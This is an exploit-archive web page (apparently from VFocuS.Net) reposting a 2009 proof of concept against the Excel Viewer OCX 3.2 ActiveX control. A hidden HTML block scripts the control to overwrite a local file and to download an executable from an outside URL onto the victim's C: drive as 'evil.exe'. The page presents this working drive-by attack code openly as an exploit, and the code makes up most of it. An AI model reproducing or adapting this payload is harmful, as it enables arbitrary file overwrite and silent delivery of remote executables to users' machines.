首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ExcelOCX ActiveX 3.2 (Download File) Insecure Method Exploit
来源:www.vfcocus.net 作者:Luja 发布时间:2009-01-13  
<html>
<body>
/*
--=0-0-000000000--x==-xxxxxxxxx<br/>
  -
    Excel Viewer OCX 3.2        <br/>
    homepage: www.officeocx.com <br/>
    download: www.brothersoft.com/excel-viewer-ocx-51797.html <br/>

  - RegKey Safe for Script: True<br/>
  - RegKey Safe for Init: True   <br/>
  - Implements IObjectSafety: True <br/>
  - IDisp Safe:  Safe for untrusted: caller,data <br/> 
  - IPersist Safe:  Safe for untrusted: caller,data  <br/>
  - IPStorage Safe:  Safe for untrusted: caller,data  <br>
  - Tested on Avant Browser 11.7.21 ie 6
                                                       <br/>
Vuln:                                                 <br/>
   1) Arbitrary File Download [HttpDownloadFile]<br/>
   2) Arbitrary file owerwrite [Save]  <br/>
                                         <br/>
  --==0-0000000011011110===    <br/>

    Propably it worst apps i ever see                      <br/>
    this is  funy  that It is meant as Safe for scripting   <br/>
    They want sell it l0l <br/>
            
---000----------++++---------------000  <br/>
         Alfons Luja                    <br/>
     Pozdrawiam swoich fanóF               <br/>
           9002                            <br/>
            :P                              <br/>
00 -0000000000000000===------------------x <br/>
*/<br/>

<div style="visibility:hidden;">
<object classid='clsid:18A295DA-088E-42D1-BE31-5028D7F9B965' id='kupa'></object>
<script type="text/javascript">
/*
    I dont know why but this code act correct only first time
    later it just crash ie
    In avant browser always is ok but it is necessary to wait a lot time
    to finsh loading
    - strange :x
*/   

try{
    var obj = document.getElementById('kupa');
    var rem = "http://www.adalex.pl/motyl/motyl-radio.exe";
    var loc = "C:\evil.exe";
    obj.Save("C:\owerwrite.ini");
    obj.HttpDownloadFile(rem,loc);
}
catch(err){
       window.alert('Poc failed');
}
</script>
</div>
</body>
</html>  
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Triologic Media Player 7 (.m3u
·Winamp <= 5.541 (mp3/aiff) Mul
·Comersus Shopping Cart <= v6 R
·Simple Machines Forum - Destro
·VUPlayer 2.49 .ASX File (Unive
·Silentum Uploader 1.4.0 Remote
·Word Viewer OCX 3.2 ActiveX (S
·Microsoft HTML Workshop <= 4.7
·Office Viewer ActiveX Control
·Microsoft HTML Workshop <= 4.7
·Office Viewer ActiveX Control
·phpMDJ <= 1.0.3 (id_animateur)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved